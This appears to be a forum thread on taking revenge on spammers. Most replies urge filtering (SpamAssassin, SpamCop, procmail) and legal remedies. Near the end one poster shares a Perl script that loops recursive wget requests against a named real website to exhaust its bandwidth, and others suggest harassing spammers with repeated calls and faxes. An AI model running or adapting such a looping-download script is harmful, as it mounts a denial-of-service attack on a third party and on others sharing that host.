Thanks i will have a look, damn, i lost 13+ rep points! i feel like ive been spammed again!

I have done the abuse email lookup...

and its only the ones that continue to spam that i am pursuing, ah well, thanks for the links...!

It would be great to get a script that could read the headers on a spam email and then send a copy autmatically to the relevant abuse addresses ( detecting fakes etc ) and also does a whois and automatically emails all the contacts at the various servers along the way...

i guess i got carried away with this new law looming:!

Electronic Frontier Foundation Action Alert!

(Issued: August 2, 2002)!

Representative Howard Berman has introduced legislation that would grant copyright holders near-immunity from the law while attacking a citizen's computer. The bill protects copyright holders from legal action stemming from denial-of-service attacks on people whom they suspect of using material in an unauthorized way on a peer-to-peer (P2P) network. In a ridiculously vague caveat, Berman's bill graciously says that the availability of your other files may not be impaired unless "reasonably necessary."

alexiskb writes:

damn, i lost 13+ rep points! i feel like ive been spammed again!

It would seem the monks of this house don't approve of your understandable but misguided desire for revenge.

Likewise, neither do I, but in the spirt of "less heat, more light" I'll offer the following:

1. Look into SpamAssassin for state-of-the-art filtering
2. And Spam Cop is a system that does an excellent job of parsing spam and routing complaints to the appropriate party.

Fight spam, yes, but don't descend to their level.

Peace,
-McD

I stand corrected, i guess freedom of speech is what the net is all about... i will try to exercise more restraint next time i get a breast size enhancement email.

Don't get me wrong, it's not a simple case of freedom of speech, since in many US states, UCE is illegal, just like junk faxes. You have a right to legal remedy, such as this example of someone suing the spammer fax.com.

If you just start randomly hacking things, or trying to deny service to someone's Web site just because they sent you UCE, you're going to inconvenience a lot more people than the marketer. The ISP might have many legitimate customers that could ne knocked out by your actions.

If you don't read UCE, and especially, don't buy their products, the business incentive behind sending it diminishes. Spam filters and blacklists are starting to have a real monetary effect on spammers, and the more people band together to try and control this sotr of activity, the better off we'll all be.

If everyone took matters in to their own hands, you can imagine the chaos.

Makeshifts last the longest.

Add a rule to your .procmailrc to filter email with that URL in the body and get on with life.

Better to LART or at least blacklist the spammer... "just filter it" does nothing to combat theft of resources (bandwidth and cycles on the mail server). And who knows, maybe a particularly intelligent spammer will take you off their list if they get enough 551 go fsck yourself replies from sendmail....

--
F o x t r o t U n i f o r m
Found a typo in this node? /msg me
The hell with paco, vote for Erudil!

Unfortunately the headers are forged most of the time.
If the ad contains an 800 number, better to call repeatedly and ask very stupid and annoying question, very slowly. 800 calls cost actual money. Or you could fax their fax with a nice message in a 200pt font repeatedly.

-Lee

"To be civilized is to deny one's nature."

shotgunefx beat me to it.. the problem is that most of the time, spammers don't even care about what comes back. They fire off a few million mails and simply don't care at all about how many of them get rejected, bounced, filtered or otherwise don't reach their destination because if even 0.01% of recipients do react to these mails, they've at least broken even, if not made a profit. It simply doesn't matter whether you bounce a spam mail, sendmail rejects it, or whatever. The only way to combat theft of resources is to silently filter spam as close to the source as possible.

.procmailrc is just available to anyone, while the system's sendmail configuration may not be. If you do have access to it, all the better.

Makeshifts last the longest.

Does the attack go entirely through nations (including starting and ending servers) where maliciously hacking servers is legal? (The Phillipines is promising: hacking is legally undefined (thus legal) there. Fortunately, even the Phillipines pays attention to property damage).

If not, may I suggest something more effective: a UCE bouncer email client. Apple's default email client for OS X has this feature (manually configured), so it should be legal most places. (The client must, of course, use the real from path, rather than the From: header, which is worthless.)

Even if the UCE specialist used 3rd party relay to launch his emails, you would be motivating that ISP to fix their config files. Otherwise, you're persuading the UCE specialist to remove the dead email.

In fact, UCE is illegal in many countries; I'm not sure about its status in the US, but I think I heard that it is there as well. It has been banned by law in Germany a long time ago, although that has of course not decreased the amount of foreign spam. Even not given those laws though I don't see how UCE bouncing could ever be construed as illegal.

Makeshifts last the longest.

UCE is legal in the U.S. with the condition that a functional opt-out URL be provided in all instances of the UCE. (Such a URL is an email validator, alas. This actually makes things easier for UCE specialists, since there is no particular requirement to remove the email address from other email lists.)

However, the Federal law explicitly legalizing UCE is fairly recent (late 2001?). Violations are the domain of the U.S. FTC.

ok, reputation suicide. I know, but what can I do?

First I check what is the spammer hosting (dig sitename)
then I go to the hosting and see how much they charge for bandwidth...
having a DSL with no limits it is really handy.
then it is just a matter of using the friendly.pl bellow




#!/usr/bin/perl -w
$SIG{HUP}  = \&end_it_all;
$SIG{TERM} = \&end_it_all;
$SIG{INT}  = \&end_it_all;
$SIG{QUIT} = \&end_it_all;
$count = 0;
$host  = "www.BIOPROTEC.COM.BR";
while (1)
{
$exit = system("wget -r -l100 -U \"Stop sending me SPAM! This is the o
+nly way to make you undestand.\"  http://$host");
        $count ++;
        if ($exit)
        {
          &end_it_all;
        }
}
sub end_it_all()
{

  print "\n did some funny things some $count times... naughty, naught
+y\n";
  exit(0);
}
[download]

What's the point in writing Perl to drive a static wget call? Either write bash or use LWP::Parallel::UserAgent. Better yet, find something that's more worth your while to code.

Makeshifts last the longest.